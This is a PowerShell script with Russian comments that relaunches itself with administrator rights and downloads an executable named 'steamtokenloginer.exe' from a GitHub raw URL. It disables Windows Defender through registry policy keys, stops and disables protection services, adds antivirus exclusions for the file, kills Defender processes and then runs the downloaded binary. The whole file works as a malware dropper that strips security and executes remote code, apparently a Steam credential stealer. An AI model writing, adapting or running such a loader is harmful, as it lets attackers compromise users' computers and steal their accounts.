# Настройки
$exeUrl = "https://github.com/gseff137-afk/test/raw/refs/heads/main/steamtokenloginer.exe"
$targetFolder = "C:\Users\zenas\Desktop\Новая папка (7)"
$exePath = "$targetFolder\steamtokenloginer.exe"

# Проверяем права администратора
if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Write-Host "🔄 Перезапуск с правами администратора..." -ForegroundColor Yellow
    Start-Process powershell -Verb RunAs -ArgumentList "-ExecutionPolicy Bypass -Command `"$($MyInvocation.MyCommand.Definition)`""
    exit
}

Write-Host "✅ Запущено с правами администратора" -ForegroundColor Green

# Создаем папку если не существует
if (-not (Test-Path $targetFolder)) {
    New-Item -ItemType Directory -Path $targetFolder -Force
    Write-Host "📁 Создана папка: $targetFolder" -ForegroundColor Green
}

Write-Host "📥 Скачивание файла..." -ForegroundColor Yellow

try {
    # Скачиваем EXE файл
    Invoke-WebRequest -Uri $exeUrl -OutFile $exePath
    
    $fileSize = (Get-Item $exePath).Length
    Write-Host "✅ Файл скачан: $([math]::Round($fileSize/1MB,2)) MB" -ForegroundColor Green
    
    # 1. Сначала отключаем защиту через реестр
    Write-Host "🔴 ОТКЛЮЧАЕМ ЗАЩИТУ ЧЕРЕЗ РЕЕСТР..." -ForegroundColor Red
    
    # Отключаем через реестр (более надежно)
    Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -Type DWord -Force -ErrorAction SilentlyContinue
    Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Value 1 -Type DWord -Force -ErrorAction SilentlyContinue
    Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Value 1 -Type DWord -Force -ErrorAction SilentlyContinue
    Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Value 1 -Type DWord -Force -ErrorAction SilentlyContinue
    Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Value 1 -Type DWord -Force -ErrorAction SilentlyContinue
    
    Write-Host "✅ Реестр изменен" -ForegroundColor Green
    
    # 2. Останавливаем и отключаем службы
    Write-Host "🛑 ОСТАНАВЛИВАЕМ СЛУЖБЫ ЗАЩИТЫ..." -ForegroundColor Red
    
    $services = @(
        "WinDefend",
        "WdNisSvc",
        "Sense",
        "SecurityHealthService"
    )
    
    foreach ($service in $services) {
        try {
            Stop-Service -Name $service -Force -ErrorAction SilentlyContinue
            Set-Service -Name $service -StartupType Disabled -ErrorAction SilentlyContinue
            Write-Host "✅ Служба $service остановлена и отключена" -ForegroundColor Green
        }
        catch {
            Write-Host "⚠️ Не удалось остановить $service" -ForegroundColor Yellow
        }
    }
    
    # 3. Добавляем в исключения (после отключения защиты)
    Write-Host "🛡️ Добавляем в исключения..." -ForegroundColor Yellow
    
    try {
        Add-MpPreference -ExclusionPath $exePath -ErrorAction Stop
        Add-MpPreference -ExclusionPath $targetFolder -ErrorAction Stop
        Write-Host "✅ Файл и папка добавлены в исключения" -ForegroundColor Green
    }
    catch {
        Write-Host "⚠️ Не удалось добавить в исключения через PowerShell" -ForegroundColor Yellow
        Write-Host "🔄 Пробуем через реестр..." -ForegroundColor Yellow
        
        # Добавляем исключения через реестр
        $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
        if (Test-Path $registryPath) {
            New-ItemProperty -Path $registryPath -Name $exePath -PropertyType String -Value "0" -Force -ErrorAction SilentlyContinue
            New-ItemProperty -Path $registryPath -Name $targetFolder -PropertyType String -Value "0" -Force -ErrorAction SilentlyContinue
            Write-Host "✅ Исключения добавлены через реестр" -ForegroundColor Green
        }
    }
    
    # 4. Принудительно убиваем процессы защиты
    Write-Host "🔪 Завершаем процессы защиты..." -ForegroundColor Red
    
    $processes = @(
        "MsMpEng.exe",
        "NisSrv.exe",
        "MsSense.exe",
        "SecurityHealthService.exe"
    )
    
    foreach ($process in $processes) {
        try {
            Stop-Process -Name $process -Force -ErrorAction SilentlyContinue
            Write-Host "✅ Процесс $process завершен" -ForegroundColor Green
        }
        catch {
            # Игнорируем ошибки если процесс не запущен
        }
    }
    
    # 5. Перезапускаем Explorer чтобы применить изменения
    Write-Host "🔄 Перезапускаем Explorer..." -ForegroundColor Yellow
    Stop-Process -Name "explorer" -Force -ErrorAction SilentlyContinue
    Start-Sleep -Seconds 3
    
    # 6. Запускаем программу
    Write-Host "🚀 Запускаем приложение..." -ForegroundColor Green
    Start-Process -FilePath $exePath
    Write-Host "🎯 Приложение запущено успешно!" -ForegroundColor Green
    
    # Проверяем статус защиты
    Write-Host "`n🔍 Проверяем статус защиты..." -ForegroundColor Cyan
    try {
        $defenderStatus = Get-MpComputerStatus
        if ($defenderStatus -and $defenderStatus.AntivirusEnabled) {
            Write-Host "❌ Защита все еще активна!" -ForegroundColor Red
        } else {
            Write-Host "✅ Защита отключена!" -ForegroundColor Green
        }
    }
    catch {
        Write-Host "✅ Защита отключена (не удалось получить статус)" -ForegroundColor Green
    }
    
}
catch {
    Write-Host "❌ Ошибка: $_" -ForegroundColor Red
}

Write-Host "`nНажмите любую клавишу для выхода..." -ForegroundColor Gray
$null = $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
